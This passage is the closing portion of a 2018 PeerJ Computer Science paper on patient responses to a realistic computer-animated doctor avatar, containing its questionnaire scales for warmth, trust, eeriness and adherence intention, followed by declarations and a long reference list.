understanding—Understanding 5. Has my interests at heart—Doesn’t have my interests at heart R 6. Self-centered—Not self-centered Trustworthiness 1. Honorable—Dishonorable R 2. Moral—Immoral R 3. Untrustworthy—Trustworthy 4. Honest—Dishonest R 5. Unethical—Ethical 6. Phony—Genuine Competence 1. Intelligent—Unintelligent R 2. Bright—Stupid R 3. Inexpert—Expert 4. Incompetent—Competent Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 20/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ 5. Informed—Uninformed R 6. Untrained—Trained Realism 1. Computer animated—Real 2. Replica—Original 3. Digitally copied—Authentic Humanness 1. Inanimate—Living 2. Synthetic—Natural 3. Mechanical movement—Biological movement 4. Human-made—Humanlike 5. Without definite lifespan—Mortal Eeriness 1. Ordinary—Creepy 2. Plain—Weird 3. Predictable—Eerie 4. Typical—Supernatural 5. Bland—Uncanny 6. Dull—Freaky 7. Boring—Shocking 8. Uninspiring—Spine-tingling Adherence Intention Indicate your level of agreement in your role as patient during the consultation. Strongly Disagree—Strongly Agree 1. I’d return to Dr. Richards for diabetes retesting. 2. If I were diagnosed as prediabetic, I would consult a different doctor instead of Dr. Richards. R 3. I’d ignore any treatment advice from Dr. Richards. R 4. I’d double my number of meals and cut the quantity in half, if Dr. Richards said it would prevent complications. 5. I’d inject myself with insulin 30 minutes before each meal if Dr. Richards recommended it. 6. I’d follow Dr. Richards’ recommendation to exercise at least half an hour each day. 7. I could not rid my diet of sugar even if Dr. Richards ordered it. R 8. I’d make any lifestyle change Dr. Richards’ suggests to stop the disease from progressing. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 21/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Enjoyment 1. Exciting—Ordinary 2. Suspenseful—Predictable 3. Boring—Interesting R 4. Entertaining—Dull 5. Amusing—Tedious 6. Unimaginative—Imaginative R 7. Depressing—Cheerful R 8. Enjoyable—Unpleasant 9. Fun—Tiresome 10. Awkward—Adept R 11. Professional—Amateurish 12. Humorous—Solemn Supplementary Material: Videos The videos may be viewed at DOI 10.6084/m9.figshare.7300088. ACKNOWLEDGEMENTS We would like to express our appreciation to Himalaya Patel, Lino Stephen, Jennifer K. Stewart, and Zebulun M. Wood for helping to produce the interactive visual narratives: Himalaya Patel filmed and edited the narratives; Himalaya Patel and Zebulun Wood took reference photographs for computer modeling; Lino Stephen modeled the doctor and his props and office; and Jennifer K. Stewart voiced the nurse. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported by an IUPUI Signature Center grant. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosure The following grant information was disclosed by the authors: An IUPUI Signature Center. Competing Interests The authors declare that they have no competing interests. Author Contributions � Zhengyan Dai performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 22/29 https://doi.org/10.6084/m9.figshare.7300088 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ � Karl F. MacDorman conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The study was approved by the Indiana University Office of Research Administration (January 5, 2018, OHRP Category 7, Study No. 1712290464). Data Availability The following information was supplied regarding data availability: The raw data can be found in the Supplemental Information. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.168#supplemental-information. REFERENCES An LC, Demers MR, Kirch MA, Considine-Dunn S, Nair V, Dasgupta K, Narisetty N, Resnicow K, Ahluwalia J. 2013. A randomized trial of an avatar-hosted multiple behavior change intervention for young adult smokers. Journal of the National Cancer Institute Monographs 2013(47):209–215 DOI 10.1093/jncimonographs/lgt021. Anam R, Andrade AD, Ruiz JG. 2016. Promoting lifestyle change through medical avatars. Encyclopedia of E-Health and Telemedicine. 1:316–330. Hershey: IGI Global DOI 10.4018/978-1-4666-9978-6.ch026. Bailenson JN, Yee N, Merget D, Schroeder R. 2006. The effect of behavioral realism and form realism of real-time avatar faces on verbal disclosure, nonverbal disclosure, emotion recognition, and copresence in dyadic interaction. Presence: Teleoperators and Virtual Environments 15(4):359–372 DOI 10.1162/pres.15.4.359. Balkrishnan R. 2005. The importance of medication adherence in improving chronic-disease related outcomes: what we know and what we need to further know. Medical Care 43(6):517–520 DOI 10.1097/01.mlr.0000166617.68751.5f. Baranowski T, Buday R, Thompson DI, Baranowski J. 2008. Playing for real: video games and stories for health-related behavior change. American Journal of Preventive Medicine 34(1):74–82.e10 DOI 10.1016/j.amepre.2007.09.027. Baylor AL. 2009. Promoting motivation with virtual agents and avatars: role of visual presence and appearance. Philosophical Transactions of the Royal Society of London B: Biological Sciences 364(1535):3559–3565 DOI 10.1098/rstb.2009.0148. Baylor AL. 2011. The design of motivational agents and avatars. Educational Technology Research and Development 59(2):291–300 DOI 10.1007/s11423-011-9196-3. Baylor AL, Kim Y. 2005. Simulating instructional roles through pedagogical agents. International Journal of Artificial Intelligence in Education 15(1):95–115. Baylor AL, Ryu J. 2003. The effects of image and animation in enhancing pedagogical agent persona. Journal of Educational Computing Research 28(4):373–394 DOI 10.2190/V0WQ-NWGN-JB54-FAT4. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 23/29 http://dx.doi.org/10.7717/peerj-cs.168#supplemental-information http://dx.doi.org/10.7717/peerj-cs.168#supplemental-information http://dx.doi.org/10.7717/peerj-cs.168#supplemental-information http://dx.doi.org/10.1093/jncimonographs/lgt021 http://dx.doi.org/10.4018/978-1-4666-9978-6.ch026 http://dx.doi.org/10.1162/pres.15.4.359 http://dx.doi.org/10.1097/01.mlr.0000166617.68751.5f http://dx.doi.org/10.1016/j.amepre.2007.09.027 http://dx.doi.org/10.1098/rstb.2009.0148 http://dx.doi.org/10.1007/s11423-011-9196-3 http://dx.doi.org/10.2190/V0WQ-NWGN-JB54-FAT4 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Benjamin RM. 2012. Medication adherence: helping patients take their medicines as directed. Public Health Reports 127(1):2–3 DOI 10.1177/003335491212700102. Bennett JK, Fuertes JN, Keitel M, Phillips R. 2011. The role of patient attachment and working alliance on patient adherence, satisfaction, and health-related quality of life in lupus treatment. Patient Education and Counseling 85(1):53–59 DOI 10.1016/j.pec.2010.08.005. Bente G, Rüggenberg S, Krämer NC, Eschenburg F. 2008. Avatar-mediated networking: increasing social presence and interpersonal trust in net-based collaborations. Human Communication Research 34(2):287–318 DOI 10.1111/j.1468-2958.2008.00322.x. Bickmore TW, Pfeifer LM, Byron D, Forsythe S, Henault LE, Jack BW, Silliman R, Paasche-Orlow MK. 2010a. Usability of conversational agents by patients with inadequate health literacy: evidence from two clinical trials. Journal of Health Communication 15(sup2):197–210 DOI 10.1080/10810730.2010.499991. Bickmore TW, Pfeifer LM, Jack BW. 2009. Taking the time to care: empowering low health literacy hospital patients with virtual nurse agents. In: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems. New York: ACM, 1265–1274 DOI 10.1145/1518701.1518891. Bickmore TW, Pfeifer LM, Paasche-Orlow MK. 2009. Using computer agents to explain medical documents to patients with low health literacy. Patient Education and Counseling 75(3):315–320 DOI 10.1016/j.pec.2009.02.007. Bickmore TW, Puskar K, Schlenk EA, Pfeifer LM, Sereika SM. 2010b. Maintaining reality: relational agents for antipsychotic medication adherence. Interacting with Computers 22(4):276–288 DOI 10.1016/j.intcom.2010.02.001. Bodenheimer T, Chen E, Bennett HD. 2009. Confronting the growing burden of chronic disease: can the US health care workforce do the job? Health Affairs 28(1):64–74 DOI 10.1377/hlthaff.28.1.64. Bodenheimer TS, Smith MD. 2013. Primary care: proposed solutions to the physician shortage without training more physicians. Health Affairs 32(11):1881–1886 DOI 10.1377/hlthaff.2013.0234. Borel J-C, Pepin J-L, Pison C, Vesin A, Gonzalez-Bermejo J, Court-Fortune I, Timsit J-F. 2014. Long-term adherence with non-invasive ventilation improves prognosis in obese COPD patients. Respirology 19(6):857–865 DOI 10.1111/resp.12327. Burgoon JK, Hale JL. 1988. Nonverbal expectancy violations: model elaboration and application to immediacy behaviors. Communications Monographs 55(1):58–79 DOI 10.1080/03637758809376158. Burgoon JK, Pfau M, Parrott R, Birk T, Coker R, Burgoon M. 1987. Relational communication, satisfaction, compliance-gaining strategies, and compliance in communication between physicians and patients. Communications Monographs 54(3):307–324 DOI 10.1080/03637758709390235. Burgoon JK, Walther JB. 1990. Nonverbal expectancies and the evaluative consequences of violations. Human Communication Research 17(2):232–265 DOI 10.1111/j.1468-2958.1990.tb00232.x. Chaiken S. 1979. Communicator physical attractiveness and persuasion. Journal of Personality and Social Psychology 37(8):1387–1397 DOI 10.1037/0022-3514.37.8.1387. Chaiken S. 1980. Heuristic versus systematic information processing and the use of source versus message cues in persuasion. Journal of Personality and Social Psychology 39(5):752–766 DOI 10.1037/0022-3514.39.5.752. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 24/29 http://dx.doi.org/10.1177/003335491212700102 http://dx.doi.org/10.1016/j.pec.2010.08.005 http://dx.doi.org/10.1111/j.1468-2958.2008.00322.x http://dx.doi.org/10.1080/10810730.2010.499991 http://dx.doi.org/10.1145/1518701.1518891 http://dx.doi.org/10.1016/j.pec.2009.02.007 http://dx.doi.org/10.1016/j.intcom.2010.02.001 http://dx.doi.org/10.1377/hlthaff.28.1.64 http://dx.doi.org/10.1377/hlthaff.2013.0234 http://dx.doi.org/10.1111/resp.12327 http://dx.doi.org/10.1080/03637758809376158 http://dx.doi.org/10.1080/03637758709390235 http://dx.doi.org/10.1111/j.1468-2958.1990.tb00232.x http://dx.doi.org/10.1037/0022-3514.37.8.1387 http://dx.doi.org/10.1037/0022-3514.39.5.752 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Chang G, Weiss AP, Orav EJ, Smallwood JA, Gonzalez S, Kosowsky JM, Rauch SL. 2012. Bottlenecks in the emergency department: the psychiatric clinicians’ perspective. General Hospital Psychiatry 34(4):403–409 DOI 10.1016/j.genhosppsych.2012.03.005. Chattopadhyay D, MacDorman KF. 2016. Familiar faces rendered strange: why inconsistent realism drives characters into the uncanny valley. Journal of Vision 16(11):7 DOI 10.1167/16.11.7. Cohen J. 1973. Eta-squared and partial eta-squared in fixed factor ANOVA designs. Educational and Psychological Measurement 33(1):107–112 DOI 10.1177/001316447303300111. Colwill JM, Cultice JM, Kruse RL. 2008. Will generalist physician supply meet demands of an increasing and aging population? Health Affairs 27(3):w232–w241 DOI 10.1377/hlthaff.27.3.w232. Cook DA, Triola MM. 2009. Virtual patients: a critical literature review and proposed next steps. Medical Education 43(4):303–311 DOI 10.1111/j.1365-2923.2008.03286.x. Cousin G, Mast MS, Jaunin-Stalder N. 2013. When physician-expressed uncertainty leads to patient dissatisfaction: a gender study. Medical Education 47(9):923–931 DOI 10.1111/medu.12237. Cousin G, Mast MS, Roter DL, Hall JA. 2012. Concordance between physician communication style and patient attitudes predicts patient satisfaction. Patient Education and Counseling 87(2):193–197 DOI 10.1016/j.pec.2011.08.004. Cuddy AJ, Fiske ST, Glick P. 2008. Warmth and competence as universal dimensions of social perception: the stereotype content model and the BIAS map. Advances in Experimental Social Psychology 40:61–149 DOI 10.1016/S0065-2601(07)00002-0. Cutler RL, Fernandez-Llimos F, Frommer M, Benrimoj C, Garcia-Cardenas V. 2018. Economic impact of medication non-adherence by disease groups: a systematic review. BMJ Open 8:e016982 DOI 10.1136/bmjopen-2017-016982. Cyr D, Hassanein K, Head M, Ivanov A. 2007. The role of social presence in establishing loyalty in e-service environments. Interacting with Computers 19(1):43–56 DOI 10.1016/j.intcom.2006.07.010. DeSmet A, Van Ryckeghem D, Compernolle S, Baranowski T, Thompson D, Crombez G, Poels K, Van Lippevelde W, Bastiaensens S, Van Cleemput K, Vandebosch H, De Bourdeaudhuij I. 2014. A meta-analysis of serious digital games for healthy lifestyle promotion. Preventive Medicine 69:95–107 DOI 10.1016/j.ypmed.2014.08.026. Fiske ST, Cuddy AJ, Glick P. 2007. Universal dimensions of social cognition: warmth and competence. Trends in Cognitive Sciences 11(2):77–83 DOI 10.1016/j.tics.2006.11.005. Fiske ST, Cuddy AJ, Glick P, Xu J. 2002. A model of (often mixed) stereotype content: competence and warmth respectively follow from perceived status and competition. Journal of Personality and Social Psychology 82(6):878–902 DOI 10.1037/0022-3514.82.6.878. Funke F, Reips U-D. 2012. Why semantic differentials in web-based research should be made from visual analogue scales and not from 5-point scales. Field Methods 24(3):310–327 DOI 10.1177/1525822X12444061. Garau M, Slater M, Pertaub D-P, Razzaque S. 2005. The responses of people to virtual humans in an immersive virtual environment. Presence: Teleoperators and Virtual Environments 14(1):104–116 DOI 10.1162/1054746053890242. Gilbert RL, Forney A. 2015. Can avatars pass the Turing test? Intelligent agent perception in a 3D virtual environment. International Journal of Human-Computer Studies 73:30–36 DOI 10.1016/j.ijhcs.2014.08.001. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 25/29 http://dx.doi.org/10.1016/j.genhosppsych.2012.03.005 http://dx.doi.org/10.1167/16.11.7 http://dx.doi.org/10.1177/001316447303300111 http://dx.doi.org/10.1377/hlthaff.27.3.w232 http://dx.doi.org/10.1111/j.1365-2923.2008.03286.x http://dx.doi.org/10.1111/medu.12237 http://dx.doi.org/10.1016/j.pec.2011.08.004 http://dx.doi.org/10.1016/S0065-2601(07)00002-0 http://dx.doi.org/10.1136/bmjopen-2017-016982 http://dx.doi.org/10.1016/j.intcom.2006.07.010 http://dx.doi.org/10.1016/j.ypmed.2014.08.026 http://dx.doi.org/10.1016/j.tics.2006.11.005 http://dx.doi.org/10.1037/0022-3514.82.6.878 http://dx.doi.org/10.1177/1525822X12444061 http://dx.doi.org/10.1162/1054746053890242 http://dx.doi.org/10.1016/j.ijhcs.2014.08.001 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Guadagno RE, Swinth KR, Blascovich J. 2011. Social evaluations of embodied agents and avatars. Computers in Human Behavior 27(6):2380–2385 DOI 10.1016/j.chb.2011.07.017. Ho C-C, MacDorman KF. 2010. Revisiting the uncanny valley theory: developing and validating an alternative to the Godspeed indices. Computers in Human Behavior 26(6):1508–1518 DOI 10.1016/j.chb.2010.05.015. Ho C-C, MacDorman KF. 2017. Measuring the uncanny valley effect. International Journal of Social Robotics 9(1):129–139. Holzwarth M, Janiszewski C, Neumann MM. 2006. The influence of avatars on online consumer shopping behavior. Journal of Marketing 70(4):19–36 DOI 10.1509/jmkg.70.4.19. Hu L, Bentler PM. 1999. Cutoff criteria for fit indexes in covariance structure analysis: conventional criteria versus new alternatives. Structural Equation Modeling: A Multidisciplinary Journal 6(1):1–55 DOI 10.1080/10705519909540118. Iuga AO, McGuire MJ. 2014. Adherence and health care costs. Risk Management and Healthcare Policy 7:35–44 DOI 10.2147/RMHP.S19801. Jackson DL. 2003. Revisiting sample size and number of parameter estimates: some support for the N:q hypothesis. Structural Equation Modeling 10(1):128–141 DOI 10.1207/S15328007SEM1001_6. Jain SP, Posavac SS. 2001. Prepurchase attribute verifiability, source credibility, and persuasion. Journal of Consumer Psychology 11(3):169–180 DOI 10.1207/S15327663JCP1103_03. Janssen SM, Lagro-Janssen AL. 2012. A Physician’s gender, communication style, patient preferences and patient satisfaction in gynecology and obstetrics: a systematic review. Patient Education and Counseling 89(2):221–226 DOI 10.1016/j.pec.2012.06.034. Jin S-AA, Bolebruch J. 2009. Avatar-based advertising in Second Life: the role of presence and attractiveness of virtual spokespersons. Journal of Interactive Advertising 10:51–60 DOI 10.1080/15252019.2009.10722162. Jin S-AA, Sung Y. 2010. The roles of spokes-avatars’ personalities in brand communication in 3D virtual environments. Journal of Brand Management 17(5):317–327 DOI 10.1057/bm.2009.18. Joseph WB. 1982. The credibility of physically attractive communicators: a review. Journal of Advertising 11(3):15–24 DOI 10.1080/00913367.1982.10672807. Kätsyri J, Förger K, Mäkäräinen M, Takala T. 2015. A review of empirical evidence on different uncanny valley hypotheses: support for perceptual mismatch as one road to the valley of eeriness. Frontiers in Psychology 6:390 DOI 10.3389/fpsyg.2015.00390. Keeling K, McGoldrick P, Beatty S. 2010. Avatars as salespeople: communication style, trust, and intentions. Journal of Business Research 63(8):793–800 DOI 10.1016/j.jbusres.2008.12.015. Khan RF, Sutcliffe A. 2014. Attractive agents are more persuasive. International Journal of Human-Computer Interaction 30(2):142–150 DOI 10.1080/10447318.2013.839904. Kim Y, Baylor AL, Shen E. 2007. Pedagogical agents as learning companions: the impact of agent emotion and gender. Journal of Computer Assisted Learning 23(3):220–234 DOI 10.1111/j.1365-2729.2006.00210.x. Kim SS, Kaplowitz S, Johnston MV. 2004. The effects of physician empathy on patient satisfaction and compliance. Evaluation & the Health Professions 27(3):237–251 DOI 10.1177/0163278704267037. Kline RB. 2016. Principles and practice of structural equation modeling. New York: Guilford Press. Kokkinara E, McDonnell R. 2015. Animation realism affects perceived character appeal of a self-virtual face. In: Proceedings of the Eighth ACM SIGGRAPH Conference on Motion in Games. New York: ACM, 221–226 DOI 10.1145/2822013.2822035. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 26/29 http://dx.doi.org/10.1016/j.chb.2011.07.017 http://dx.doi.org/10.1016/j.chb.2010.05.015 http://dx.doi.org/10.1509/jmkg.70.4.19 http://dx.doi.org/10.1080/10705519909540118 http://dx.doi.org/10.2147/RMHP.S19801 http://dx.doi.org/10.1207/S15328007SEM1001_6 http://dx.doi.org/10.1207/S15327663JCP1103_03 http://dx.doi.org/10.1016/j.pec.2012.06.034 http://dx.doi.org/10.1080/15252019.2009.10722162 http://dx.doi.org/10.1057/bm.2009.18 http://dx.doi.org/10.1080/00913367.1982.10672807 http://dx.doi.org/10.3389/fpsyg.2015.00390 http://dx.doi.org/10.1016/j.jbusres.2008.12.015 http://dx.doi.org/10.1080/10447318.2013.839904 http://dx.doi.org/10.1111/j.1365-2729.2006.00210.x http://dx.doi.org/10.1177/0163278704267037 http://dx.doi.org/10.1145/2822013.2822035 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ LaCrosse MB. 1975. Nonverbal behavior and perceived counselor attractiveness and persuasiveness. Journal of Counseling Psychology 22(6):563–566 DOI 10.1037/0022-0167.22.6.563. Lu AS, Baranowski T, Thompson D, Buday R. 2012. Story immersion of videogames for youth health promotion: a review of literature. GAMES FOR HEALTH: Research, Development, and Clinical Applications 1(3):199–204 DOI 10.1089/g4h.2011.0012. MacCallum RC, Browne MW, Sugawara HM. 1996. Power analysis and determination of sample size for covariance structure modeling. Psychological Methods 1(2):130–149 DOI 10.1037//1082-989x.1.2.130. MacDorman KF, Chattopadhyay D. 2016. Reducing consistency in human realism increases the uncanny valley effect; increasing category uncertainty does not. Cognition 146:190–205 DOI 10.1016/j.cognition.2015.09.019. MacDorman KF, Green RD, Ho C-C, Koch CT. 2009. Too real for comfort? Uncanny responses to computer generated faces. Computers in Human Behavior 25(3):695–710 DOI 10.1016/j.chb.2008.12.026. Maddux JE, Rogers RW. 1980. Effects of source expertness, physical attractiveness, and supporting arguments on persuasion: a case of brains over beauty. Journal of Personality and Social Psychology 39(2):235–244 DOI 10.1037/0022-3514.39.2.235. Mäkäräinen M, Kätsyri J, Förger K, Takala T. 2015. The funcanny valley: a study of positive emotional reactions to strangeness. In: Proceedings of the 19th International Academic Mindtrek Conference. ACM, 175–181. Mangan B. 2015. The uncanny valley as fringe experience. Interaction Studies 16(2):193–199 DOI 10.1075/is.16.2.05man. Marple BF, Fornadley JA, Patel AA, Fineman SM, Fromer L, Krouse JH, Lanier BQ, Penna P. 2007. Keys to successful management of patients with allergic rhinitis: focus on patient confidence, compliance, and satisfaction. Otolaryngology-Head and Neck Surgery 136(6-suppl):S107–S124 DOI 10.1016/j.otohns.2007.02.031. Mast MS, Hall JA, Roter DL. 2007. Disentangling physician sex and physician communication style: their effects on patient satisfaction in a virtual medical visit. Patient Education and Counseling 68(1):16–22 DOI 10.1016/j.pec.2007.03.020. Mathur MB, Reichling DB. 2016. Navigating a social world with robot partners: a quantitative cartography of the uncanny valley. Cognition 146:22–32 DOI 10.1016/j.cognition.2015.09.008. McCroskey JC, Teven JJ. 1999. Goodwill: a reexamination of the construct and its measurement. Communications Monographs 66(1):90–103 DOI 10.1080/03637759909376464. McGinnies E, Ward CD. 1980. Better liked than right: trustworthiness and expertise as factors in credibility. Personality and Social Psychology Bulletin 6(3):467–472 DOI 10.1177/014616728063023. Mitchell WJ, Szerszen KA, Lu AS, Schermerhorn PW, Scheutz M, MacDorman KF. 2011. A mismatch in the human realism of face and voice produces an uncanny valley. i-Perception 2(1):10–12 DOI 10.1068/i0415. Moore RK. 2012. A Bayesian explanation of the ‘uncanny valley’ effect and related psychological phenomena. Scientific Reports 2(1):864 DOI 10.1038/srep00864. Mori M. 2012. The uncanny valley (MacDorman KF, Kageki N, Trans.). IEEE Robotics and Automation 19(2):98–100 DOI 10.1109/MRA.2012.2192811. O’Hair D. 1986. Patient preferences for physician persuasion strategies. Theoretical Medicine 7(2):147–164 DOI 10.1007/BF00489227. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 27/29 http://dx.doi.org/10.1037/0022-0167.22.6.563 http://dx.doi.org/10.1089/g4h.2011.0012 http://dx.doi.org/10.1037//1082-989x.1.2.130 http://dx.doi.org/10.1016/j.cognition.2015.09.019 http://dx.doi.org/10.1016/j.chb.2008.12.026 http://dx.doi.org/10.1037/0022-3514.39.2.235 http://dx.doi.org/10.1075/is.16.2.05man http://dx.doi.org/10.1016/j.otohns.2007.02.031 http://dx.doi.org/10.1016/j.pec.2007.03.020 http://dx.doi.org/10.1016/j.cognition.2015.09.008 http://dx.doi.org/10.1080/03637759909376464 http://dx.doi.org/10.1177/014616728063023 http://dx.doi.org/10.1068/i0415 http://dx.doi.org/10.1038/srep00864 http://dx.doi.org/10.1109/MRA.2012.2192811 http://dx.doi.org/10.1007/BF00489227 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ O’Hair D, O’Hair MJ, Southward GM, Krayer KJ. 1987. Physician communication and patient compliance. Journal of Compliance in Health Care 2(2):125–129. Ohana S, Mash R. 2015. Physician and patient perceptions of cultural competency and medical compliance. Health Education Research 30(6):923–934 DOI 10.1093/her/cyv060. Pallak SR. 1983. Salience of a communicator’s physical attractiveness and persuasion: a heuristic versus systematic processing interpretation. Social Cognition 2(2):158–170 DOI 10.1521/soco.1983.2.2.158. Pallak SR, Murroni E, Koch J. 1983. Communicator attractiveness and expertise, emotional versus rational appeals, and persuasion: a heuristic versus systematic processing interpretation. Social Cognition 2(2):122–141 DOI 10.1521/soco.1983.2.2.122. Parsons TD, Kenny P, Ntuen CA, Pataki CS, Pato MT, Rizzo AA, St-George C, Sugar J. 2008. Objective structured clinical interview training using a virtual human patient. Studies in Health Technology and Informatics 132:357–362. Patel H, MacDorman KF. 2015. Sending an avatar to do a human’s job: compliance with authority persists despite the uncanny valley. Presence: Teleoperators and Virtual Environments 24(1):1–23 DOI 10.1162/PRES_a_00212. Peña J, Yoo S-C. 2014. Under pressure: avatar appearance and cognitive load effects on attitudes, trustworthiness, bidding, and interpersonal distance in a virtual store. Presence: Teleoperators and Virtual Environments 23(1):18–32 DOI 10.1162/PRES_a_00166. Perry SD, Jenzowsky SA, Hester JB, King CM, Yi H. 1997. The influence of commercial humor on program enjoyment and evaluation. Journalism & Mass Communication Quarterly 74(2):388–399 DOI 10.1177/107769909707400210. Persky S. 2011. Employing immersive virtual environments for innovative experiments in health care communication. Patient Education and Counseling 82(3):313–317 DOI 10.1016/j.pec.2010.12.007. Persky S, Eccleston CP. 2011. Medical student bias and care recommendations for an obese versus non-obese virtual patient. International Journal of Obesity 35:728–735. Pickersgill T. 2001. The European working time directive for doctors in training: we will need more doctors and better organisation to comply with the law. BMJ: British Medical Journal 323(7324):1266. Plant EA, Baylor AL, Doerr CE, Rosenberg-Kima RB. 2009. Changing middle-school students’ attitudes and performance regarding engineering with computer-based social models. Computers & Education 53(2):209–215 DOI 10.1016/j.compedu.2009.01.013. Pornpitakpan C. 2004. The persuasiveness of source credibility: a critical review of five decades’ evidence. Journal of Applied Social Psychology 34(2):243–281 DOI 10.1111/j.1559-1816.2004.tb02547.x. Potempa KM, Redman RW, Landstrom G. 2009. Human resources in nursing education: a worldwide crisis. Collegian 16(1):19–23 DOI 10.1016/j.colegn.2008.12.003. Qiu L, Benbasat I. 2009. Evaluating anthropomorphic product recommendation agents: a social relationship perspective to designing information systems. Journal of Management Information Systems 25(4):145–182 DOI 10.2753/MIS0742-1222250405. Raij AB, Johnsen K, Dickerson RF, Lok BC, Cohen MS, Duerson M, Pauly RR, Stevens AO, Wagner P, Lind DS. 2007. Comparing interpersonal interactions with a virtual human to those with a real human. IEEE Transactions on Visualization and Computer Graphics 13(3):443–457 DOI 10.1109/TVCG.2007.1030. Read JL, Shortell SM. 2011. Interactive games to promote behavior change in prevention and treatment. JAMA 305(16):1704–1705 DOI 10.1001/jama.2011.408. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 28/29 http://dx.doi.org/10.1093/her/cyv060 http://dx.doi.org/10.1521/soco.1983.2.2.158 http://dx.doi.org/10.1521/soco.1983.2.2.122 http://dx.doi.org/10.1162/PRES_a_00212 http://dx.doi.org/10.1162/PRES_a_00166 http://dx.doi.org/10.1177/107769909707400210 http://dx.doi.org/10.1016/j.pec.2010.12.007 http://dx.doi.org/10.1016/j.compedu.2009.01.013 http://dx.doi.org/10.1111/j.1559-1816.2004.tb02547.x http://dx.doi.org/10.1016/j.colegn.2008.12.003 http://dx.doi.org/10.2753/MIS0742-1222250405 http://dx.doi.org/10.1109/TVCG.2007.1030 http://dx.doi.org/10.1001/jama.2011.408 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Reips U-D, Funke F. 2008. Interval-level measurement with visual analogue scales in Internet-based research: VAS Generator. Behavior Research Methods 40(3):699–704 DOI 10.3758/BRM.40.3.699. Roebuck MC, Liberman JN, Gemmill-Toyama M, Brennan TA. 2011. Medication adherence leads to lower health care use and costs despite increased drug spending. Health Affairs 30(1):91–99 DOI 10.1377/hlthaff.2009.1087. Sertoglu AE, Catl O, Korkmaz S. 2014. Examining the effect of endorser credibility on the consumers’ buying intentions: an empirical study in Turkey. International Review of Management and Marketing 4:66. Seyama J, Nagayama RS. 2007. The uncanny valley: effect of realism on the impression of artificial human faces. Presence: Teleoperators and Virtual Environments 16(4):337–351 DOI 10.1162/pres.16.4.337. Skalski P, Tamborini R. 2007. The role of social presence in interactive agent-based persuasion. Media Psychology 10(3):385–413 DOI 10.1080/15213260701533102. Sklar DP. 2013. How many doctors will we need? A special issue on the physician workforce. Academic Medicine 88(12):1785–1787 DOI 10.1097/ACM.0000000000000030. Swain S, Hariharan M, Rana S, Chivukula U, Thomas M. 2015. Doctor–patient communication: impact on adherence and prognosis among patients with primary hypertension. Psychological Studies 60(1):25–32 DOI 10.1007/s12646-014-0291-5. Thompson D. 2012. Designing serious video games for health behavior change: current status and future directions. Journal of Diabetes Science and Technology 6(4):807–811 DOI 10.1177/193229681200600411. Tongpeth J, Du HY, Clark RA. 2018. Development and feasibility testing of an avatar-based education application for patients with acute coronary syndrome. Journal of Clinical Nursing 27(19–20):3561–3571 DOI 10.1111/jocn.14528. Van Der Heide B, Schumaker EM. 2013. Computer-mediated persuasion and compliance: social influence on the Internet and beyond. Social Net: Understanding Our Online Behavior 2:79–98 DOI 10.1093/acprof:oso/9780199639540.001.0001. Vermeire E, Hearnshaw H, Van Royen P, Denekens J. 2001. Patient adherence to treatment: three decades of research. A comprehensive review. Journal of Clinical Pharmacy and Therapeutics 26(5):331–342 DOI 10.1046/j.1365-2710.2001.00363.x. Willson P, McNamara JR. 1982. How perceptions of a simulated physician–patient interaction influence intended satisfaction and compliance. Social Science & Medicine 16(19):1699–1704 DOI 10.1016/0277-9536(82)90095-8. Wood NT, Solomon MR, Englis BG. 2005. Personalisation of online avatars: is the messenger as important as the message? International Journal of Internet Marketing and Advertising 2(1/2):143–161 DOI 10.1504/IJIMA.2005.007509. Zanbaka C, Goolkasian P, Hodges L. 2006. Can a virtual cat persuade you? The role of gender and realism in speaker persuasiveness. In: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, New York: ACM, 1153–1162 DOI 10.1145/1124772.1124945. Zibrek K, Kokkinara E, McDonnell R. 2018. The effect of realistic appearance of virtual characters in immersive environments— Does the character’s personality play a role? IEEE Transactions on Visualization and Computer Graphics 24(4):1681–1690 DOI 10.1109/tvcg.2018.2794638. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 29/29 http://dx.doi.org/10.3758/BRM.40.3.699 http://dx.doi.org/10.1377/hlthaff.2009.1087 http://dx.doi.org/10.1162/pres.16.4.337 http://dx.doi.org/10.1080/15213260701533102 http://dx.doi.org/10.1097/ACM.0000000000000030 http://dx.doi.org/10.1007/s12646-014-0291-5 http://dx.doi.org/10.1177/193229681200600411 http://dx.doi.org/10.1111/jocn.14528 http://dx.doi.org/10.1093/acprof:oso/9780199639540.001.0001 http://dx.doi.org/10.1046/j.1365-2710.2001.00363.x http://dx.doi.org/10.1016/0277-9536(82)90095-8 http://dx.doi.org/10.1504/IJIMA.2005.007509 http://dx.doi.org/10.1145/1124772.1124945 http://dx.doi.org/10.1109/tvcg.2018.2794638 